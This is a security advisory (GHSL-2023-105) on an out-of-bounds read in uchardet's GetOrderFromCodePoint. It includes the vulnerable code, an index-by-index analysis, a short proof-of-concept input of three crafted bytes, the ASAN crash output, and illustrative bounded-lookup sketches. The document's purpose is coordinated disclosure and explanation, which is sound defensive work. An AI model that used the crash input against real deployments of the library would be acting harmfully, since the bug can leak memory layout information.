August 21, 2023

GHSL-2023-105: Buffer Overflow in uchardet

Jaroslav Lobacevski

Coordinated Disclosure Timeline

Summary

A crafted sequence of bytes triggers a memory read past the bounds of a globally allocated buffer.

Product

uchardet

Tested Version

Master branch, post v0.0.8.

Details

Global buffer read overflow in GetOrderFromCodePoint (GHSL-2023-105)

The out-of-bounds read happens in GetOrderFromCodePoint at [1] once i becomes equal to max. In the PoC, max is initially 64 [2], which is half the true size of the mModel->charOrderTable buffer, because the table stores two integers per entry (128 integers in total). i starts at 32 [3]. Every entry the search visits is smaller than the PoC code point, so each iteration moves i upward until it reaches 63. There the branch at [4] assigns max to i [5], making i equal to 64. In the next iteration, the index i * 2 (128) at [1] reads one integer past the end of the 128-element buffer.

int nsLanguageDetector::GetOrderFromCodePoint(int codePoint)
{
  int max = mModel->charOrderTableSize; // [2]
  int i   = max / 2; // [3]
  int c   = mModel->charOrderTable[i * 2];

  while ((c = mModel->charOrderTable[i * 2]) != codePoint) // [1] buffer read overflow
  {
    if (c > codePoint)
    {
      if (i == 0)
        break;
      max = i - 1;
      i = i / 2;
    }
    else if (i < max - 1)
    {
      i += (max - i) / 2;
    }
    else if (i == max - 1) // [4]
    {
      i = max; // [5]
    }
    else
    {
      break;
    }
  }

  return (c == codePoint) ? mModel->charOrderTable[i * 2 + 1] : -1;
}
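
The index progression in the PoC can be replayed outside uchardet. The following is a minimal sketch, not uchardet code: MakeMockTable and TraceReads are hypothetical helpers, and the mock table only assumes 64 ascending (code point, order) pairs whose code points are all smaller than the one being searched for. The loop body mirrors the branches of the function quoted above but stops before performing the out-of-bounds read.

```cpp
#include <cassert>
#include <vector>

// Hypothetical stand-in for the model table: `pairs` (codePoint, order)
// entries stored flat, so the vector holds 2 * pairs ints.
std::vector<int> MakeMockTable(int pairs) {
  std::vector<int> table;
  for (int k = 0; k < pairs; ++k) {
    table.push_back(0x0600 + k);  // ascending mock code points
    table.push_back(k);           // mock order value
  }
  return table;
}

// Replays the index updates of the quoted loop and returns every flat
// index (i * 2) the loop condition would read. The last recorded index is
// not dereferenced if it falls outside the table.
std::vector<int> TraceReads(const std::vector<int>& table, int tableSize,
                            int codePoint) {
  assert(tableSize >= 0);
  std::vector<int> reads;
  int max = tableSize;
  int i = max / 2;
  for (;;) {
    int idx = i * 2;
    reads.push_back(idx);
    if (idx >= static_cast<int>(table.size()))
      break;  // the original code performs this read anyway
    int c = table[idx];
    if (c == codePoint)
      break;
    if (c > codePoint) {
      if (i == 0)
        break;
      max = i - 1;
      i = i / 2;
    } else if (i < max - 1) {
      i += (max - i) / 2;
    } else if (i == max - 1) {
      i = max;  // the step marked [5]
    } else {
      break;
    }
  }
  return reads;
}
```

With a 64-pair mock table and a code point of 0x6F22, TraceReads records the flat indices 64, 96, 112, 120, 124, 126 and finally 128, which equals the number of ints in the table and is therefore one element past its end.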

Impact

This issue may be used to leak internal memory allocation information.
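
For comparison, a lookup over the same kind of table can keep every read in bounds by searching a half-open range. This is only an illustrative sketch and not the upstream fix: GetOrderBounded is a hypothetical name, and the code assumes the table holds `pairs` (code point, order) entries sorted in ascending order by code point.

```cpp
#include <cassert>

// Looks up codePoint in a flat table of `pairs` (codePoint, order) entries
// sorted by code point. Returns the order, or -1 when the code point is
// absent. Every index read satisfies mid < pairs, so mid * 2 + 1 stays
// inside the 2 * pairs ints of the table.
int GetOrderBounded(const int* table, int pairs, int codePoint) {
  assert(pairs >= 0);
  int lo = 0;
  int hi = pairs;  // half-open range [lo, hi)
  while (lo < hi) {
    int mid = lo + (hi - lo) / 2;
    int c = table[mid * 2];
    if (c == codePoint)
      return table[mid * 2 + 1];
    if (c < codePoint)
      lo = mid + 1;
    else
      hi = mid;
  }
  return -1;
}
```

Because the loop only runs while lo < hi and hi never exceeds pairs, a code point larger than every entry ends the search with -1 rather than stepping to index `pairs`.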

Resources

To reproduce the issue:

  1. Make an ASAN build, or set a breakpoint with the condition i == 64 at while ((c = mModel->charOrderTable[i * 2]) != codePoint).
  2. Run the following program to trigger the ASAN out-of-bounds report or hit the breakpoint:
    uchardet_t ud = uchardet_new();
    uchardet_handle_data(ud, "\xe6\xbc\xa2", 3);
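
The three input bytes \xe6\xbc\xa2 are the UTF-8 encoding of the code point U+6F22. The stack trace in this advisory shows nsLanguageDetector::HandleData receiving an int const*, so the lookup presumably operates on decoded code points like this one. The decoding arithmetic can be checked with a small sketch. DecodeUtf8ThreeBytes is a hypothetical helper written for illustration, not uchardet's own decoder.

```cpp
#include <cassert>
#include <cstdint>

// Decodes one three-byte UTF-8 sequence (1110xxxx 10xxxxxx 10xxxxxx).
// Returns -1 if the bytes do not match that pattern. Overlong-form and
// surrogate checks are omitted for brevity.
int32_t DecodeUtf8ThreeBytes(const unsigned char* s) {
  assert(s != nullptr);
  if ((s[0] & 0xF0) != 0xE0 || (s[1] & 0xC0) != 0x80 ||
      (s[2] & 0xC0) != 0x80)
    return -1;
  return ((s[0] & 0x0F) << 12) | ((s[1] & 0x3F) << 6) | (s[2] & 0x3F);
}
```

For the PoC bytes, the payload bits are 0x6, 0x3C and 0x22, which combine to 0x6F22.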
    

The output when built with ASAN:

==13==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000006100a0 at pc 0x000000595025 bp 0x7ffc86d95830 sp 0x7ffc86d95828
READ of size 4 at 0x0000006100a0 thread T0
SCARINESS: 17 (4-byte-read-global-buffer-overflow)
    #0 0x595024 in GetOrderFromCodePoint /src/uchardet/src/nsLanguageDetector.cpp:254:15
    #1 0x595024 in nsLanguageDetector::HandleData(int const*, unsigned int) /src/uchardet/src/nsLanguageDetector.cpp:49:13
    #2 0x584dbd in nsMBCSGroupProber::HandleData(char const*, unsigned int, int**, int*) /src/uchardet/src/nsMBCSGroupProber.cpp:369:32
    #3 0x57e3cd in nsUniversalDetector::HandleData(char const*, unsigned int) /src/uchardet/src/nsUniversalDetector.cpp:275:34
    #4 0x5786ae in uchardet_handle_data /src/uchardet/src/uchardet.cpp:220:63

DEDUP_TOKEN: GetOrderFromCodePoint--nsLanguageDetector::HandleData(int const*, unsigned int)--nsMBCSGroupProber::HandleData(char const*, unsigned int, int**, int*)
0x0000006100a0 is located 0 bytes to the right of global variable 'Unicode_CharOrder' defined in '/src/uchardet/src/LangModels/LangArabicModel.cpp:110:27' (0x60fea0) of size 512
SUMMARY: AddressSanitizer: global-buffer-overflow /src/uchardet/src/nsLanguageDetector.cpp:254:15 in GetOrderFromCodePoint
Shadow bytes around the buggy address:
  0x0000800b9fc0: f9 f9 f9 f9 00 05 f9 f9 00 00 00 00 00 00 f9 f9
  0x0000800b9fd0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b9fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b9ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800ba000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0000800ba010: 00 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800ba020: f9 f9 f9 f9 00 00 00 00 00 00 00 f9 f9 f9 f9 f9
  0x0000800ba030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800ba040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800ba050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800ba060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==13==ABORTING
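
The addresses in the report line up with the index arithmetic from the Details section. The faulting address is 0x6100a0, and 'Unicode_CharOrder' starts at 0x60fea0 with a size of 512 bytes. Assuming 4-byte elements, as the "READ of size 4" line suggests, the fault is at element 128 of a 128-element array. The sketch below performs that calculation; ElementIndex is a hypothetical helper.

```cpp
#include <cassert>
#include <cstdint>

// Element index of a faulting address relative to the start of an array
// whose elements are elemSize bytes wide.
uint64_t ElementIndex(uint64_t faultAddr, uint64_t baseAddr,
                      uint64_t elemSize) {
  assert(elemSize != 0 && faultAddr >= baseAddr);
  return (faultAddr - baseAddr) / elemSize;
}
```

ElementIndex(0x6100a0, 0x60fea0, 4) evaluates to 128, which is i * 2 for i == 64 and is the first index past the 512-byte object. This agrees with ASAN's "0 bytes to the right" description.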

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2023-105 in any communication regarding this issue.